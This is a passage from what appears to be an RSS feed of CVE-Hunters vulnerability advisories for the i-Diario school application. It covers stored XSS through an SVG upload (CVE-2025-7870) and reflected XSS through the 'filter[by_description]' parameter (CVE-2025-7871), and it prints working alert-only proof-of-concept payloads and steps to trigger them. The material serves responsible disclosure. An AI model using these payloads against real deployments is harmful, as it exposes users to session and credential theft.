&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;http://www.w3.org/2000/svg&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;none&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;This is an XSS-POC from CVEHUNTERS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Create the file with the payload and upload in the &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7870-cross-site-scripting-xss-storage-injection-via-svg-upload&amp;#34;&amp;gt;CVE-2025-7870: Cross-Site Scripting (XSS) Storage Injection via SVG Upload
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An attacker can upload a malicious SVG file containing embedded JavaScript that is executed when the file is accessed directly. This results in Stored Cross-Site Scripting (XSS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint allows users to upload files after upload a crafted svg the XSS could be trigger when open the file.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;http://www.w3.org/2000/svg&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;none&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;This is an XSS-POC from CVEHUNTERS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Create the file with the payload and upload in the &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7870/image.png&amp;#34;
	width=&amp;#34;1015&amp;#34;
	height=&amp;#34;489&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7870/image_hu_97f480d64265cd01.png 480w, /p/cve-2025-7870/image_hu_716aaa27c91d8c32.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;207&amp;#34;
		data-flex-basis=&amp;#34;498px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After that open the file to trigger the XSS&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7870/image-1.png&amp;#34;
	width=&amp;#34;1014&amp;#34;
	height=&amp;#34;554&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7870/image-1_hu_f8cd9eca2b7a1c6.png 480w, /p/cve-2025-7870/image-1_hu_8545ee9302fe0aef.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;439px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7871</title>
        <link>https://www.cvehunters.com/p/cve-2025-7871/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7871/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7871-cross-site-scripting-xss-reflected-endpoint-conteudos-parameter-filterby_description&amp;#34;&amp;gt;CVE-2025-7871: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image.png&amp;#34;
	width=&amp;#34;1068&amp;#34;
	height=&amp;#34;456&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image-1.png&amp;#34;
	width=&amp;#34;1782&amp;#34;
	height=&amp;#34;1042&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
		data-flex-basis=&amp;#34;410px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7871-cross-site-scripting-xss-reflected-endpoint-conteudos-parameter-filterby_description&amp;#34;&amp;gt;CVE-2025-7871: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image.png&amp;#34;
	width=&amp;#34;1068&amp;#34;
	height=&amp;#34;456&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image-1.png&amp;#34;
	width=&amp;#34;1782&amp;#34;
	height=&amp;#34;1042&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
